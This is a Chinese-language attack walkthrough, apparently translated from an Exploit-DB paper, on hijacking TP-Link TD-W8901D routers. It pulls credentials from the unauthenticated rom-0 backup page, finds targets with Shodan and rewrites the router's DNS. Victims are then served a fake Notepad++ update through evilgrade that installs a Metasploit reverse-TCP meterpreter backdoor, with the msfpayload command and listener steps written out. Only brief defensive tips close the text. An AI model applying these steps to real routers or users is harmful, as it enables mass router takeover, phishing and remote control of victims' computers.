from: http://www.exploit-db.com/wp-content/themes/exploit/docs/33369.pdf
一臺筆記本電腦 TD-W8901D路由器(firmware 6.0.0) 虛擬機(WIN7)、Kali Linux(攻擊機)、evilgrade(一個模塊化的腳本框架,可實現偽造的升級、自帶DNS和WEB服務模塊,http://www.infobyte.com.ar/down/isr-evilgrade-Readme.txt) Metasploit。
互聯網攻擊示意圖:
局域網攻擊示意圖
市場上有很多類型的路由器可用,但絕大部分從未升級固件,所以可對大多數家用路由進行這個攻擊,在這個項目中使用的是最常見的TPlink路由器。
TPLINK某些版本有一個關鍵的漏洞:未授權訪問Firmware/Romfile界面,無需登陸密碼,像這樣http://IP//rpFWUpload.html。
同時也可以下載romfile備份文件(rom-0),像這樣:http://IP address/rom-0。
步驟一:下載rom文件
下載回來的rom文件需要逆向工程得到明文密碼,但有一個更簡單的方法,去俄羅斯的一個網站可以解密 http://www.hakim.ws/huawei/rom-0/
步驟二:使用賬號密碼登陸
第三步:使用搜索引擎SHODAN 搜索RomPager,可在互聯網上找到700多萬個這種設備
簡單的改變一下路由器的DNS,就可以重定向用戶的請求,這個方法可以用來釣魚(從我了解的情況看來,國內已經有大批路由被利用,并已經被黑產用作釣魚欺詐,黑產表打我,我猜的)。但這個太簡單了,作者希望玩的更高(hua)深(shao)一些。
默認DNS的配置是這樣:
改成攻擊者自己的DNS:
攻擊系統:DNS服務器一臺、kali預裝了evilgrade 和metasploit。
第五步:建一個帶后門的payload,給用戶發送升級指令。LHOST= 攻擊者機器IP和 LPORT =任何開放的端口。
Commad:@@# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.5.132 LPORT=8080 x > navebackdoor.exe
第六步:啟動metasploit、運行payload
?
第七步:設置監聽主機和監聽端口,命令:set LHOST(攻擊者的IP)、set LPORT(監聽端口,創建后門時分配的)、exploit(進行攻擊)
第八步:啟動假的WEB升級服務器evilgrade,執行show modules后,可以看到很多假更新模塊,這里選用notepadplus
第九步:show options可以看到模塊的使用方法,設置后門升級文件路徑使用agent:
Set ?agent ?‘[“<%OUT%>/root/Desktop/navebackdoor.exe<%OUT%>”]’
第十步:完成以上動作后,啟動EvilGrade的WEB服務器:
start
第十一步:等受害者打開notepadplus,一旦打開就會彈出要求更新的提示,更新過程中將會加載我們的后門程序。
第十二步:在攻擊機器上,evilgrade和Metasploit建立會話,等待返回的shell
第十三步:拿到shell,使用sysinfo查看一下:
輸入help可以看到很多命令,包括scrrenshot、killav,運行vnc 等
經常升級你的路由器版本
路由器不要在公網暴露
系統和軟件升級時檢查證書
設置靜態IP,比如google的8.8.8.8、8.8.4.4(廣告:阿里巴巴的公共dns 223.5.5.5 和 223.6.6.6)